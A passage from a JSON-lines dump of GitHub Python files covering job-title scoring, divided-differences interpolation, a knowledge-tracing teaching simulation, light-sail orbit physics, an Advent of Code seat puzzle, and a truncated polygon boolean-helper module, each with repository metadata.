Gives each job a starting score based on job title \"\"\"\n for job in self.job_aggregate_data:\n for category in job.keys():\n if category == \"title\":\n job_title = job.get(\"title\").lower() # ignoring capitalization\n if self.check_against_BASE_HIGH(job_title):\n self.total_score = 2.5\n elif self.check_against_BASE_LOW(job_title):\n self.total_score = -2.5\n elif self.check_against_BASE_MID(job_title):\n self.total_score = 0\n else: # NO RELATED TERMS (IN SCOPE OF PROJECT)\n self.total_score = -3\n self.job[job_title] = self.total_score\n self._RATED_JOBS.append(self.job)\n\n def check_against_BASE_HIGH(self, job_title):\n \"\"\" Used only by base_scoring(); helper function that\n compares each term in _BASE_TERMS_HIGH with each job title \"\"\"\n for term in self._BASE_TERMS_HIGH:\n if job_title.find(term) != -1:\n return True\n return False\n\n def check_against_BASE_MID(self, job_title):\n \"\"\" Used only by base_scoring(); helper function that\n compares each term in _BASE_TERMS_MID with each job title \"\"\"\n for term in self._BASE_TERMS_MID:\n if job_title.find(term) != -1:\n return True\n return False\n\n def check_against_BASE_LOW(self, job_title):\n \"\"\" Used only by base_scoring(); helper function that\n compares each term in _BASE_TERMS_LOW with each job title \"\"\"\n for term in self._BASE_TERMS_LOW:\n if job_title.find(term) != -1:\n return True\n return False\n\n def apply_modifiers(self):\n \"\"\" Applies modifier floats from _MOD_TERMS \"\"\"\n for job in self.job_aggregate_data:\n for category in job.keys():\n if category == \"title\":\n job_title = 
job.get(\"title\").lower()\n for term in self._MOD_TERMS:\n if (job_title.find(term) != -1) and (not self.check_for_removal(job_title)):\n self.total_score += self._MOD_TERMS[term]\n\n def check_for_removal(self, job_title):\n \"\"\" Helper function used by only apply_modifiers();\n checks to see if a job has a base score of -3 or lower\n and ignores applying modifiers if so \"\"\"\n for jobs in self._RATED_JOBS: # job is a dict\n for title in jobs.keys():\n if title == job_title:\n if jobs[title] <= -3:\n return True # should be removed\n return False # should not be removed\n\n def modify_score_for_search_term(self, search_term):\n \"\"\" Checks the job summary to see if any words match the provided search term \"\"\"\n count = 0\n for job in self.job_aggregate_data:\n for category in job.keys():\n if category == \"summary\":\n summary = parse_string(job.get(\"summary\").lower()) # ignore capitalization\n for word in summary:\n if word == search_term.lower():\n count += 1\n print(\"count: \" + str(count))\n search_term_modifier = 0.25 * count\n self.total_score += search_term_modifier\n\n\ndef main():\n pass\n # test_point_gen = PointGeneration('jsonTest_techFocus')\n # test_point_gen.base_scoring()\n # test_point_gen.apply_modifiers()\n # test_point_gen.modify_score_for_search_term(\"support\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DataIsGone/job-aggregator","sub_path":"PointGeneration.py","file_name":"PointGeneration.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71670211892","text":"from sympy import *\nimport numpy as np\n\nx = Symbol('x')\n# m = [[1, 2], [0, 4], [4, -16]]\nm = [[-3, 9], [5, 2], [7, -1], [8, 0]]\n# m = [[0,2], [1,3], [2,2], [3,1], [4,3]]\n\ninicio = m[0][1]\ndiagonal = [inicio]\ncolumna = []\ncolumnas = []\n\n\ndef clear():\n copy_col = columna.copy()\n columnas.append(copy_col)\n del columna[:]\n\n\ndef inicial():\n i = 0\n while i <= len(m):\n try:\n col = (m[i + 1][1] - m[i][1]) / (m[i + 1][0] - m[i][0])\n if i == 0:\n diagonal.append(int(col))\n columna.append(col)\n except Exception:\n pass\n i += 1\n clear()\n\n\ndef diferencias_divididas(j):\n i = 0\n while i <= len(columnas[j]):\n try:\n col = (columnas[j][i + 1] - columnas[j][i]) / (m[i + j + 2][0] - m[i][0])\n if i == 0:\n diagonal.append(col)\n columna.append(col)\n except Exception:\n pass\n i += 1\n clear()\n\n\ndef formula():\n x = Symbol('x')\n '''\n # 3 elementos\n print(expand(diagonal[0]+ \n diagonal[1]*(x-m[0][0]) +\n diagonal[2]*(x-m[0][0])*(x-m[1][0])\n )\n )\n '''\n\n # 4 elementos\n print(expand(diagonal[0] +\n diagonal[1] * (x - m[0][0]) +\n diagonal[2] * (x - m[0][0]) * (x - m[1][0]) +\n diagonal[3] * (x - m[0][0]) * (x - m[1][0]) * (x - m[2][0])\n )\n )\n\n '''\n # 5 elementos\n print(expand(diagonal[0]+ \n diagonal[1]*(x-m[0][0]) +\n diagonal[2]*(x-m[0][0])*(x-m[1][0]) +\n diagonal[3]*(x-m[0][0])*(x-m[1][0])*(x-m[2][0]) +\n diagonal[4]*(x-m[0][0])*(x-m[1][0])*(x-m[2][0])*(x-m[3][0])\n )\n )\n '''\n\n\ndef print_matrix():\n matrix = np.zeros((len(m), len(m) + 2))\n # Always\n for i in range(len(m)):\n matrix[i][0] = i\n for i in range(len(m)):\n matrix[i][1] = m[i][0]\n for i in range(len(m)):\n matrix[i][2] = m[i][1]\n # Column 3\n for i in range(len(columnas[0])):\n matrix[i + 1][3] = columnas[0][i]\n # Column 4\n for i in range(len(columnas[1])):\n matrix[i + 2][4] = columnas[1][i]\n # Column 5\n for i in range(len(columnas[2])):\n matrix[i + 3][5] = 
columnas[2][i]\n '''\n # Column 6\n for i in range(len(columnas[3])):\n matrix[i+4][6] = columnas[3][i]\n '''\n print(matrix)\n\n\nif __name__ == '__main__':\n inicial()\n j = 0\n while True:\n if len(columnas[j]) != 1:\n diferencias_divididas(j)\n j += 1\n else:\n break\n print(diagonal)\n print(columnas)\n formula()\n print_matrix()\n","repo_name":"czunigamunoz/ResolucionEcuacionesNoLineales","sub_path":"diferencias_divididas.py","file_name":"diferencias_divididas.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25532587232","text":"\nfrom random import randint\nfrom random import random\n\nimport math\nimport copy\nimport random\n\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n###############################################################################################\n################## CONDITION COMPARISONS ######################################\n###############################################################################################\n\n\n#####################################################\n######### C-BKT UPDATE ##############\n#####################################################\n\ndef probability_attempted(t, time_attempted):\n\tif t > time_attempted:\n\t\treturn 1\n\telse:\n\t\treturn float(t) / time_attempted\n\t\t\ndef update_belief_right(sk, slip, guess):\n\tknows_notslipped = sk*(1-slip)\n\tnotknows_guessed = (1-sk)*guess\n\ttop = knows_notslipped\n\tbottom = knows_notslipped + notknows_guessed\n\treturn top / bottom\n\t\ndef update_belief_wrong(sk, slip, guess, t, attempted):\n\tknow_tried_slipped = sk*probability_attempted(t, attempted)*slip\n\tknows_nottried = sk*(1-probability_attempted(t, attempted))\n\tnotknows_nottried = (1-sk)*(1-probability_attempted(t, attempted))\n\tnotknows_tried_notguessed = (1-sk)*probability_attempted(t, attempted)*(1-guess) \n\ttop = know_tried_slipped + knows_nottried\n\tbottom = know_tried_slipped + knows_nottried + notknows_nottried + notknows_tried_notguessed \n\treturn top / bottom\n\t\ndef CBKT_get_new_belief(obs, p, task, ts):\n\tb_round = []\n\tfor skill in range (0, len(obs)):\n\t\tcurrent_skill_obs = obs[skill]\n\t\tinit_belief = p.initial_belief[skill]\n\t\tb = 0\n\t\tfor i in range (0, history_rounds):\n\t\t\tb_ts = 0\n\t\t\tif (i == 0):\n\n\t\t\t\tif (obs[skill] == 0):\n\t\t\t\t\tb_ts = update_belief_wrong(init_belief, task.skills[skill].p_slip, task.skills[skill].p_guess,ts, task.skills[skill].attempted)\n\t\t\t\t\thistory[ts].append(b_ts)\n\t\t\t\telse:\n\t\t\t\t\tb_ts = update_belief_right(init_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\t\t\t\t\thistory[ts].append(b_ts)\n\t\t\telif (ts - i) < 0:\n\t\t\t\tb_ts = p.initial_belief[skill]\n\t\t\telse:\n\t\t\t\tb_ts = history[ts - i][skill]\n\t\t\tb += b_ts\n\t\tb = b / history_rounds\n\t\tb_round.append(b)\n\treturn b_round\n\t\n\n######################################################\n######### BKT UPDATE FROM START #######\n######################################################\n\ndef update_belief_right_traditional(sk, slip, guess):\n\tknows_notslipped = sk*(1-slip)\n\tnotknows_guessed = (1-sk)*guess\n\ttop = knows_notslipped\n\tbottom = knows_notslipped + notknows_guessed\n\treturn top / bottom\n\t\ndef update_belief_wrong_traditional(sk, slip, guess):\n\tknow_tried_slipped = sk*slip\n\tnotknows_tried_notguessed = (1-sk)*(1-guess) \n\ttop = know_tried_slipped \n\tbottom = 
know_tried_slipped + notknows_tried_notguessed \n\treturn top / bottom\n\t\ndef BKT_get_new_belief_from_start(obs, p, task):\n\tb_round = []\n\tfor skill in range (0, len(obs)):\n\t\tcurrent_skill_obs = obs[skill]\n\t\tinit_belief = p.initial_belief[skill]\n\n\t\tb = 0\n\t\tif (obs[skill] == 0):\n\t\t\tb = update_belief_wrong_traditional(init_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\t\telse:\n\t\t\tb = update_belief_right_traditional(init_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\t\tb_round.append(b)\n\treturn b_round\n\t\n\t\n###############################################################################################\n################## BKT UPDATE EVERY TIMESTEP ##################################\n###############################################################################################\n\n\ndef BKT_get_new_belief_every_timestep(obs, p, task):\n\tb_round = []\n\tfor skill in range (0, len(obs)):\n\t\tcurrent_skill_obs = obs[skill]\n\t\tcurrent_belief = p.belief[-1][skill]\n\t\tb = 0\n\n\t\tif (obs[skill] == 0):\n\t\t\tb = update_belief_wrong_traditional(current_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\t\telse:\n\t\t\tb = update_belief_right_traditional(current_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\n\t\tb_round.append(b)\n\treturn b_round\n\n\n###############################################################################################\n################## AUXILIARY FUNCTIONS ########################################\n###############################################################################################\n\t\ndef decision(probability):\n\tv = random.uniform(0.0, 1.0)\n\tif (v < probability):\n\t\treturn 1\n\telse:\n\t\treturn 0\n\ndef write_file(name,info):\n\tf = open(name+\".txt\", \"w\")\n\tfor el in info:\n\t\tf.write(str(round(el,2)) + \"\\n\")\n\tf.close()\n\t\t\t\n###############################################################################################\n################## PERSON, SKILL, AND TASKS ###################################\n###############################################################################################\n\nclass Person():\n\tdef __init__(self, p_id, task):\n\t\tself.p_id = p_id\n\t\tself.mastery = []\n\t\tself.initial_belief = []\n\t\tself.belief = []\n\t\tself.start_b = random.uniform(0.5, 0.5)\n\t\tself.prev_obs = []\n\t\tself.task = task\n\t\tfor i in range(0, task.number_skills):\n\t\t\tm = random.randint(0,1)\n\t\t\t# ~ if (m == 0):\n\t\t\t\t# ~ self.start_b = random.uniform(0.1, 0.6)\n\t\t\t# ~ else:\n\t\t\t\t# ~ self.start_b = random.uniform(0.4, 0.9)\n\t\t\tself.mastery.append(m)\n\t\t\tself.initial_belief.append(self.start_b)\n\t\tself.belief.append([self.start_b]*task.number_skills) #set to just have the initial belief (complete uncertainty) at the start\n\t\t\t\n\tdef get_obs(self, task, ts):\n\t\tobs = []\n\t\tfor i in range (0, task.number_skills):\n\t\t\tp_att = probability_attempted(ts, task.skills[i].attempted)\n\t\t\thas_attempted = decision(p_att)\n\t\t\tcan_do = self.mastery[i]\n\n\t\t\tif (has_attempted == 0):\n\t\t\t\tobs.append(0)\n\t\t\telse:\n\t\t\t\tif (can_do == 1):\n\t\t\t\t\tprobability = 1 - task.skills[i].p_slip\n\t\t\t\t\tobs.append(decision(probability))\n\t\t\t\telse:\n\t\t\t\t\tprobability = task.skills[i].p_guess\n\t\t\t\t\tobs.append(decision(probability))\n\t\treturn obs\n\t\n\tdef teach_skill(self, round_belief):\n\t\tmin_belief = 100\n\t\tmin_i = -1\n\t\tfor i in range(0, len(round_belief)):\n\t\t\tif 
(round_belief[i] < min_belief):\n\t\t\t\tmin_belief = round_belief[i]\n\t\t\t\tmin_i = i\n\t\tif (self.mastery[min_i] == 0):\n\t\t\tp_learning = self.task.skills[min_i].teaching\n\t\t\thas_learned = decision(p_learning)\n\t\t\t# ~ print (\"has learned\" + str(has_learned))\n\t\t\tif (has_learned):\n\t\t\t\tself.mastery[min_i] = 1\n\t\t\t\t\n\tdef teach_skill2(self, round_belief):\n\t\tless_04 = []\n\t\tfor i in range(0, len(round_belief)):\n\t\t\tif (round_belief[i] < 0.3):\n\t\t\t\tless_04.append(i)\n\t\tif (less_04 != []):\n\t\t\tmin_i = random.choice(less_04)\n\t\t\tif (self.mastery[min_i] == 0):\n\t\t\t\tp_learning = self.task.skills[min_i].teaching\n\t\t\t\thas_learned = decision(p_learning)\n\t\t\t\t# ~ print (\"has learned\" + str(has_learned))\n\t\t\t\tif (has_learned):\n\t\t\t\t\tself.mastery[min_i] = 1\n\t\t\t\t\n\tdef skills_known(self):\n\t\tcount = 0\n\t\tfor s in self.mastery:\n\t\t\tif s == 1:\n\t\t\t\tcount +=1\n\t\treturn count\n\t\t\n\t\nclass Skill():\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.p_guess = random.uniform(0.1, 0.25)\n\t\tself.p_slip = random.uniform(0.1, 0.25)\n\t\tself.attempted = random.randint(40, 150)\n\t\tself.teaching = random.uniform(0.15, 0.35)\n\n\n\t\nclass Task():\n\tdef __init__(self):\n\t\tself.skills = []\n\t\tself.number_skills = random.randint(5,10)\n\t\tfor i in range (0, self.number_skills):\n\t\t\tskill = Skill(i)\n\t\t\tself.skills.append(skill)\n\t\t\n\t\n\t\n\t\n\t\n###############################################################################################\n################## MEASURES AND REWARD FUNCTIONS ##############################\n###############################################################################################\n\ndef distance(b1, b2):\n\td = []\n\tfor ts in range (0, len(b1)):\n\t\td_ts = 0\n\t\tfor sk in range (0, len(b1[0])):\n\t\t\td_ts += abs(b1[ts][sk] - b2[ts][sk])\n\t\td.append(d_ts / len(b1[0]))\n\treturn d\n\t\n\t\n###############################################################################################\n################## 1000 ROUNDS OF SIMULATION ######################################\n###############################################################################################\n\n\t\nhistory_rounds = 10 #amount of rounds it will average over\nn_timesteps = 180\nrounds = 1000\n\nskills_learned_CBKT = []\nskills_learned_IBKT = []\nskills_learned_EBKT = []\nskills_learned_TBKT = []\nskills_learned_TS = []\n\nfor round_n in range (0, rounds): \n\ttask = Task()\n\tp = Person(round_n, task)\n\t# ~ print (p.mastery)\n\tcount_skills_known_before = p.skills_known()\n\tp_C_BKT = copy.deepcopy(p)\n\t# ~ p_T_BKT = copy.deepcopy(p)\n\tp_I_BKT = copy.deepcopy(p)\n\tp_E_BKT = copy.deepcopy(p)\n\tp_T_BKT = copy.deepcopy(p)\n\tTrue_State = copy.deepcopy(p)\n\tTrue_State.belief = [True_State.mastery]\n\thistory = [ [] for _ in range(n_timesteps) ]\n\tfor ts in range (0, n_timesteps):\n\t\tobs = p.get_obs(task, ts)\n\t\t#update for C-BKT\n\t\tb_C_BKT = CBKT_get_new_belief(obs, p_C_BKT, task, ts)\n\t\tp_C_BKT.belief.append(b_C_BKT )\n\t\t#update for I-BKT\n\t\tb_I_BKT = BKT_get_new_belief_from_start(obs, p_I_BKT, task)\n\t\tp_I_BKT.belief.append(b_I_BKT)\n\t\t#update for E-BKT\n\t\tb_E_BKT = BKT_get_new_belief_every_timestep(obs, p_E_BKT, task)\n\t\tp_E_BKT.belief.append(b_E_BKT)\n\t\t\n\t\tb_T_BKT = p_T_BKT.initial_belief\n\t\tp_T_BKT.belief.append(b_T_BKT)\n\t\t# ~ print (p_T_BKT.start_b)\n\t\t#the true state belief, will be whether they have mastery or 
not\n\t\tTrue_State.belief.append(p.mastery)\n\t\t\n\t\t# ~ print (ts % n_timesteps)\n\t\tif (ts % 20 == 19):\n\t\t\t# ~ print (\"TEACHING\")\n\t\t\tp_C_BKT.teach_skill(b_C_BKT)\n\t\t\tp_I_BKT.teach_skill(b_I_BKT)\n\t\t\tp_E_BKT.teach_skill(b_E_BKT)\n\t\t\tp_T_BKT.teach_skill(b_T_BKT)\n\t\t\tTrue_State.teach_skill(True_State.mastery)\n\t\n\t\t# ~ print (p_C_BKT.skills_known())\n\tskills_learned_CBKT.append(p_C_BKT.skills_known() - count_skills_known_before)\n\tskills_learned_IBKT.append(p_I_BKT.skills_known() - count_skills_known_before)\n\tskills_learned_EBKT.append(p_E_BKT.skills_known() - count_skills_known_before)\n\tskills_learned_TBKT.append(p_T_BKT.skills_known() - count_skills_known_before)\n\tskills_learned_TS.append(True_State.skills_known() - count_skills_known_before)\n\t\n\nav_CBKT = (sum(skills_learned_CBKT) / len(skills_learned_CBKT))\nav_IBKT = (sum(skills_learned_IBKT) / len(skills_learned_IBKT))\nav_EBKT = (sum(skills_learned_EBKT) / len(skills_learned_EBKT))\nav_TBKT = (sum(skills_learned_TBKT) / len(skills_learned_TBKT))\nav_Opt = (sum(skills_learned_TS) / len(skills_learned_TS))\n\nwrite_file(\"Learned_TBKT\", skills_learned_TBKT) \nwrite_file(\"Learned_CBKT\", skills_learned_CBKT) \nwrite_file(\"Learned_IBKT\", skills_learned_IBKT) \nwrite_file(\"Learned_EBKT\", skills_learned_EBKT) \nwrite_file(\"Learned_Opt\", skills_learned_TS) \n\nprint (av_TBKT)\nprint (av_CBKT)\nprint (av_IBKT)\nprint (av_EBKT)\nprint (av_Opt)\n\ndef barplot_annotate_brackets(num1, num2, data, center, height, yerr=None, dh=.05, barh=.05, fs=None, maxasterix=None):\n\t\"\"\" \n\tAnnotate barplot with p-values.\n\n\t:param num1: number of left bar to put bracket over\n\t:param num2: number of right bar to put bracket over\n\t:param data: string to write or number for generating asterisks\n\t:param center: centers of all bars (like plt.bar() input)\n\t:param height: heights of all bars (like plt.bar() input)\n\t:param yerr: yerrs of all bars (like plt.bar() input)\n\t:param dh: height offset over bar / bar + yerr in axes coordinates (0 to 1)\n\t:param barh: bar height in axes coordinates (0 to 1)\n\t:param fs: font size\n\t:param maxasterix: maximum number of asterisks to write (for very small p-values)\n\t\"\"\"\n\n\tif type(data) is str:\n\t\ttext = data\n\telse:\n\t\t# * is p < 0.05\n\t\t# ** is p < 0.005\n\t\t# *** is p < 0.0005\n\t\t# etc.\n\t\ttext = ''\n\t\tp = .05\n\n\t\twhile data < p:\n\t\t\ttext += '*'\n\t\t\tp /= 10.\n\n\t\t\tif maxasterix and len(text) == maxasterix:\n\t\t\t\tbreak\n\n\t\tif len(text) == 0:\n\t\t\ttext = 'n. s.'
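\n\n\t# Worked example (added comment): data=.001 yields '*' at p=.05 and '**' at\n\t# p=.005, then stops because .001 > .0005, so the bracket is labelled '**'.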
\n\n\tlx, ly = center[num1], height[num1]\n\trx, ry = center[num2], height[num2]\n\n\tif yerr:\n\t\tly += yerr[num1]\n\t\try += yerr[num2]\n\n\tax_y0, ax_y1 = plt.gca().get_ylim()\n\tdh *= (ax_y1 - ax_y0)\n\tbarh *= (ax_y1 - ax_y0)\n\n\ty = max(ly, ry) + dh\n\n\tbarx = [lx, lx, rx, rx]\n\tbary = [y, y+barh, y+barh, y]\n\tmid = ((lx+rx)/2, y+barh)\n\n\tplt.plot(barx, bary, c='black')\n\n\tkwargs = dict(ha='center', va='bottom')\n\tif fs is not None:\n\t\tkwargs['fontsize'] = fs\n\n\tplt.text(*mid, text, **kwargs)\n\n\nplt.rcParams['font.family'] = 'serif'\nplt.rcParams['font.serif'] = ['Times New Roman'] + plt.rcParams['font.serif']\nplt.rcParams.update({'font.size': 15})\n\nheights = [av_TBKT,av_IBKT,av_EBKT,av_CBKT,av_Opt]\nbars = np.arange(len(heights))\nobjects = ('T-BKT', 'I-BKT', 'E-BKT', 'C-BKT', 'Optimal')\ny_pos = np.arange(len(objects))\n\n# ~ plt.figure()\n# ~ figure(figsize=(6, 6), dpi=80)\nbarlist = plt.bar(y_pos, heights, align='center')\nbarlist[0].set_color('#ffc61e')\nbarlist[1].set_color('#009ade')\nbarlist[2].set_color('#00cd6c')\nbarlist[3].set_color('#ff1f5b')\nbarlist[4].set_color('#757575')\n\nplt.ylim(0, 2.5)\nplt.xticks(y_pos, objects)\nplt.ylabel('Number of Skills Learned')\n# ~ plt.title('Average Number of Skills Demonstrated')\nbarplot_annotate_brackets(0, 1, 'p < 0.05', bars, heights)\nbarplot_annotate_brackets(0, 2, 'p < 0.05', bars, heights, dh=.16)\nbarplot_annotate_brackets(0, 3, 'p < 0.05', bars, heights, dh=.11)\nbarplot_annotate_brackets(0, 4, 'p < 0.05', bars, heights)\nplt.show()\n\n","repo_name":"ScazLab/C-BKT","sub_path":"teaching.py","file_name":"teaching.py","file_ext":"py","file_size_in_byte":13203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73352880374","text":"import numpy as np\nfrom constants import *\nfrom initial import *\n\ndef Etot(x, y, vx, vy):\n r = np.sqrt(x**2 + y**2)\n K = 0.5*(vx**2 + vy**2)\n return K - G*Msun/r\n\ndef predict_peri(x, y, vx, vy):\n E = Etot(x, y, vx, vy)\n vec_r = np.array([x, y]) \n vec_v = np.array([vx, vy]) \n a = -G*Msun/2/E\n vec_e = ((np.linalg.norm(vec_v)**2 - G*Msun/np.linalg.norm(vec_r))*vec_r - np.dot(vec_r, vec_v)*vec_v)/(G*Msun)\n e = np.linalg.norm(vec_e)\n p = a*(1-e*e)\n return p\n\ndef Decide_Pointing(t, x, y, vx, vy, delay=0):\n r = np.array([x, y])\n v = np.array([vx, vy])\n rhat = r/np.linalg.norm(r)\n vhat = v/np.linalg.norm(v)\n Acc = False\n #limit = predict_peri(x, y, vx, vy)\n limit = np.linalg.norm(r)\n if t > delay:\n if limit > perihelion and Acc == False:\n phat = (rhat - vhat)/np.sqrt(2)\n else:\n Acc = True\n phat = (rhat + vhat)/np.sqrt(2)\n #phat = np.array([-rhat[1], rhat[0]])\n else:\n phat = np.array([-rhat[1], rhat[0]])\n return phat\n#%%\ndef core(t, y, delay=0):\n r_vec = y[:2]\n r = np.linalg.norm(r_vec)\n v_vec = y[2:]\n phat = Decide_Pointing(t, y[0], y[1], y[2], y[3], delay)\n dxdt = v_vec[0]\n dydt = v_vec[1]\n a_rp = aE*rE**2/r**2*np.dot(r_vec, phat)/np.linalg.norm(r_vec)*phat\n a_g = -G*Msun/r**3*r_vec\n a = a_rp + a_g\n dvxdt = a[0]\n dvydt = a[1]\n return np.array([dxdt, dydt, dvxdt, dvydt])\n\ndef predicted_orbit(x, y, vx, vy):\n E = Etot(x, y, vx, vy)\n if E < 0:\n vec_r = np.array([x, y]) \n vec_v = np.array([vx, vy]) \n a = -G*Msun/2/E\n vec_e = ((np.linalg.norm(vec_v)**2 - G*Msun/np.linalg.norm(vec_r))*vec_r - np.dot(vec_r, vec_v)*vec_v)/(G*Msun)\n e = np.linalg.norm(vec_e)\n h = np.linalg.norm(np.cross(np.array([vec_r[0], vec_r[1], 0]), np.array([vec_v[0], vec_v[1], 0])))\n theta = np.linspace(0, 
2*np.pi, 1000)\n r_predict = h**2/G/Msun/(1+np.linalg.norm(vec_e)*np.cos(theta))\n P = np.array([r_predict*np.cos(theta), -r_predict*np.sin(theta)])\n if e == 0:\n R = np.array([[vec_e[0], -vec_e[1]], [vec_e[1], vec_e[0]]])\n else:\n R = np.array([[vec_e[0], -vec_e[1]], [vec_e[1], vec_e[0]]])/e\n OUT = np.matmul(R, P)\n else: \n OUT = [[], []]\n return OUT\n","repo_name":"CFP106020008/Light-Sail-Simulation","sub_path":"physics.py","file_name":"physics.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7813756461","text":"from copy import deepcopy\n\n\ndef adjacent_cells(grid, y, x):\n neighbours = [(-1, 0), (-1, -1), (0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1)]\n res = []\n for (a, b) in neighbours:\n real_y = y+b\n real_x = x+a\n if 0 <= real_y < len(grid) and 0 <= real_x < len(grid[real_y]):\n while grid[real_y][real_x] not in [\"#\", \"L\"]:\n if 0 <= real_y+b < len(grid) and 0 <= real_x+a < len(grid[real_y+b]):\n real_y += b\n real_x += a\n else:\n # we hit a wall\n break\n if grid[real_y][real_x] in [\"#\", \"L\"]:\n res.append(grid[real_y][real_x])\n return res\n\n\ndef calculate_new_grid(grid):\n new_grid = deepcopy(grid)\n for idx, row in enumerate(grid):\n for idx2, col in enumerate(row):\n adjacent = adjacent_cells(grid, idx, idx2)\n if grid[idx][idx2] == \"L\" and \"#\" not in adjacent:\n new_grid[idx][idx2] = \"#\"\n elif grid[idx][idx2] == \"#\" and adjacent.count(\"#\") >= 5:\n new_grid[idx][idx2] = \"L\"\n return new_grid\n\n\ndef main():\n grid = []\n with open('input.txt') as f:\n lines = f.read().splitlines()\n for line in lines:\n grid.append(list(line))\n new_grid = calculate_new_grid(grid)\n while new_grid != grid:\n grid = new_grid\n new_grid = calculate_new_grid(grid)\n res = 0\n for row in new_grid:\n res += row.count(\"#\")\n print(f\"Result is {res}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"schovancova/adventOfCode2020","sub_path":"11/solution_part_2.py","file_name":"solution_part_2.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42216311632","text":"# -*- coding: utf-8 -*-\r\n# noqa: D205, D400, F403\r\nr\"\"\"\r\n------------\r\nnpg_bool_hlp\r\n-----------\r\n\r\n** Boolean helpers for overlay operations on poly geometry.\r\n\r\n----\r\n\r\nScript :\r\n npg_bool_hlp.py\r\n\r\nAuthor :\r\n Dan_Patterson@carleton.ca\r\n\r\n ``_.\r\n\r\nModified :\r\n 2023-06-03\r\n\r\nPurpose\r\n-------\r\nFunctions for boolean operations on polygons:\r\n\r\n\r\n\"\"\"\r\n# pylint: disable=C0103,C0302,C0415\r\n# pylint: disable=E1101,E1121\r\n# pylint: disable=W0105,W0201,W0212,W0221,W0611,W0612,W0621\r\n# pylint: disable=R0902,R0904,R0912,R0913,R0914,R0915\r\n\r\nimport sys\r\nimport numpy as np\r\nimport npg\r\nfrom npg.npGeo import roll_arrays\r\nfrom npg.npg_plots import plot_polygons # noqa\r\n\r\nft = {\"bool\": lambda x: repr(x.astype(np.int32)),\r\n \"float_kind\": '{: 6.2f}'.format}\r\nnp.set_printoptions(\r\n edgeitems=10, linewidth=120, precision=3, suppress=True, threshold=200,\r\n formatter=ft\r\n)\r\n\r\nscript = sys.argv[0]\r\n\r\n__all__ = ['add_intersections', 'prep_overlay']\r\n__helpers__ = ['_add_pnts_', 'del_seq_pnts', '_roll_', '_w_', '_wn_clip_',\r\n '_node_type_']\r\n\r\n\r\n# ---- (1) private helpers\r\n#\r\ndef _add_pnts_(ply0, ply1, x_pnts, whr):\r\n \"\"\"Return input arrays with intersections added to their 
lines.\r\n\r\n Parameters\r\n ----------\r\n ply0, ply1 : array_like\r\n N-2 arrays of clockwise ordered points representing poly* features.\r\n x_pnts : array_like\r\n The intersection points.\r\n whr : array_like\r\n The id locations where the line points intersect the polygon segments.\r\n\r\n Requires\r\n --------\r\n `_wn_clip_` is used to generate the intersection points and segments of the\r\n poly* features that they intersect on (this is the `whr` parameter).\r\n\r\n \"\"\"\r\n def _srt_pnts_(p):\r\n \"\"\"Order intersection points on a line, from the start/first point.\r\n\r\n `_sort_on_line_` is the full version, `p` is the combined point list.\r\n \"\"\"\r\n if len(p) == 2:  # -- only start and end point\r\n return p\r\n dxdy = np.abs(p[0] - p[1:])  # difference from first\r\n if dxdy.sum(axis=0)[0] == 0:  # -- vertical line check\r\n order = np.argsort(dxdy[:, 1])  # sort ascending on y-values\r\n else:\r\n order = np.argsort(dxdy[:, 0])\r\n p[1:] = p[1:][order]\r\n return p\r\n # --\r\n p_ = np.concatenate((ply0[:-1], ply0[1:]), axis=1).reshape((-1, 2, 2))\r\n p_ = list(p_)\r\n c_ = np.concatenate((ply1[:-1], ply1[1:]), axis=1).reshape((-1, 2, 2))\r\n c_ = list(c_)\r\n for cnt, cp in enumerate(whr):\r\n cl, pl = cp  # print(f\"cnt {cnt} cp {cp}\") add this below to see order\r\n x = x_pnts[cnt]\r\n chk0 = (x == c_[cl]).all(-1).any(-1)  # correct but slow\r\n chk1 = (x == p_[pl]).all(-1).any(-1)  # correct but slow\r\n if not chk0:\r\n c_[cl] = np.concatenate((c_[cl], x[None, :]), axis=0)\r\n if not chk1:\r\n p_[pl] = np.concatenate((p_[pl], x[None, :]), axis=0)\r\n for cnt, p in enumerate(p_):\r\n if len(p) > 2:\r\n p_[cnt] = _srt_pnts_(p)\r\n for cnt, c in enumerate(c_):\r\n if len(c) > 2:\r\n c_[cnt] = _srt_pnts_(c)\r\n return p_, c_\r\n\r\n\r\ndef _del_seq_pnts_(arr, poly=True):\r\n \"\"\"Remove sequential duplicates in a Nx2 array of points.\r\n\r\n Parameters\r\n ----------\r\n arr : array_like\r\n An Nx2 of point coordinates.\r\n poly : boolean\r\n True if the points originate from a polygon boundary, False otherwise.\r\n\r\n Notes\r\n -----\r\n This is largely based on the numpy.arraysetops functions `unique` and `_unique1d`.\r\n See the reference link in the script header.\r\n\r\n The method entails viewing the 2d array as a structured 1d array, then\r\n checking whether sequential values are equal. In np.unique, the values\r\n are initially sorted to determine overall uniqueness, not sequential\r\n uniqueness.\r\n\r\n See Also\r\n --------\r\n `uniq_2d` above, which can be used in situations where genuine\r\n uniqueness is desired.\r\n \"\"\"\r\n # -- like np.unique but not sorted\r\n shp_in, dt_in = arr.shape, arr.dtype\r\n # arr = np.ascontiguousarray(arr)\r\n dt = [(f'f{i}', dt_in) for i in range(arr.shape[1])]\r\n tmp = arr.view(dt).squeeze()  # -- view data and reshape to (N,)\r\n # -- mask and check for sequential equality.\r\n mask = np.empty((shp_in[0],), np.bool_)\r\n mask[0] = True\r\n mask[1:] = tmp[:-1] != 